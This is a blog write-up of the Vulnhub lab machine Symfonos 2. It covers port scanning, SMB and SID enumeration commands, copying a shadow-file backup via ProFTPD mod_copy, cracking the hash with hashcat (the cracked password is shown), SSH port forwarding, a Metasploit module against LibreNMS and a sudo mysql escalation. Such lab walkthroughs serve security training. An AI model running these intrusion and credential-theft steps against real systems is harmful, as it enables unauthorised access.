Sunday, 4 April 2021

Vulnhub Writeup: Symfonos 2

Vulnhub - Symfonos 2

Vulnhub - Symfonos 2

symfonos 2 login screen

Description

OSCP-like Intermediate real life based machine designed to teach the importance of understanding a vulnerability. SHOULD work for both VMware and Virtualbox.

You can download the box from vulnhub here.

Initial Scans

nmap -sn 192.168.110.0/24

Server is up on IP 192.168.110.131

sudo autorecon 192.168.110.131

Open Ports

PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 64 ProFTPD 1.3.5
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp  open  http        syn-ack ttl 64 WebFS httpd 1.21
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

137/udp   open          netbios-ns   udp-response        Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp   open          snmp         udp-response        net-snmp; net-snmp SNMPv3 server

21/tcp ProFTPD 1.3.5

Anonymous & random password not working

Will come back to this later with more information.

22/tcp OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

Normal looking banner

nc 192.168.110.131 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6

SSH appears to have fail2ban or similar as an attempt at user enumeration failed half way through and then the machine refuses SSH connections.

80/tcp WebFS httpd 1.21

Odd looking http server. A few hits online, but REALLY old, 7 years old project by winny on github, one exploit from 2003 on searchsploit.

symfonos2 home page

Homepage is just an image. Quick gobuster reveals absolutely nothing!

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.110.131

Same with directory-list-2.3-big.txt

Will come back with more information later.

139/tcp & 445/tcp & 137/udp Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

There appears to be an anonymous share to take a look at.

smbclient -L //192.168.110.131
smbmap -H 192.168.110.131 -u '' -p ''

anonymous smb share

cd /tmp
mkdir anonymous
sudo mount -t cifs //192.168.110.131/anonymous /tmp/anonymous
cd anonymous/
ls

There is a single file on the share, log.txt. It appears to be a few config files concatenated together.

This line could be interesting later if I can read the shadow file I might be able to crack a password.

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak

Bad users mapped to guest, handy to know for crackmapexec later (it will likely show all user/password combos as valid).

map to guest = bad user

Looks like there are home shares

[homes]
comment = Home Directories
browseable = no

Username aeolus in a couple of sections

smb here

[anonymous]
    path = /home/aeolus/share
    browseable = yes
    read only = yes
    guest ok = yes

ftp here

# Set the user and group under which the server will run.
User				aeolus
Group				aeolus

rpcclient to enumerate users

Enumeration of users with rpcclient

rpcclient

so we have aeolus, cronus and librenms in the SIDs checked. Here’s a one liner to brute force all SIDs up to 2000 on the system.

seq 0 2000 | xargs -I {} rpcclient -U '' 192.168.110.131 -N -c 'lookupsids S-1-22-1-{}' | tee sids.txt

161/udp net-snmp SNMPv3 server

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 192.168.110.131

nothing found

21/tcp ProFTPD 1.3.5 revisit

Returning to FTP

proftp command exec

looks like this might work

mod_copy

webroot confirmed at /var/www/html

testing webroot

can copy to /tmp

copy to tmp

Carrying on from there, I can copy any files the FTP anonymous user can read into the anonymous share and then read it from there.

copy to anon share

Copying the shadow.bak file that we saw earlier in the log.txt

copy shadow backup file

Copy out the usernames & password hashes in format user:hash one per line. I set my file to LF line endings as sometimes this seems to matter for hashcat even on Windows.

Cracking…

.\hashcat.exe -d 1 -m 1800 -a 0 -O --username symphonos.hashes .\wordlists\rockyou.txt

Let it run, then show results.

.\hashcat.exe -d 1 -m 1800 -a 0 -O --username symphonos.hashes .\wordlists\rockyou.txt --show
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:sergioteamo

cracking in hashcat

We’re in

ssh login

Apache & MySQL listening on localhost:8080

apache ports

apache local test

apache process

I can forward the internally listening port to my local machine using SSH port forwarding. Once this is done, I can access the librenms page at http://127.0.0.1:8081

ssh -L 8081:127.0.0.1:8080 aeolus@symfonos2

The login for librenms is the same user and password combo for the aeolus user.

Working Metasploit Module

metasploit module

metasploit running

Once we have a shell as the cronus user, it’s a simple sudo command which can be run to get root. Cronus can run mysql as root, so it’s a simple escallation from here.

Written with StackEdit.

No comments:

Post a Comment

Please be nice! :)

Nutanix CE 2.0 on ESXi AOS Upgrade Hangs

AOS Upgrade on ESXi from 6.5.2 to 6.5.3.6 hangs. Issue I have tried to upgrade my Nutanix CE 2.0 based on ESXi to a newer AOS version for ...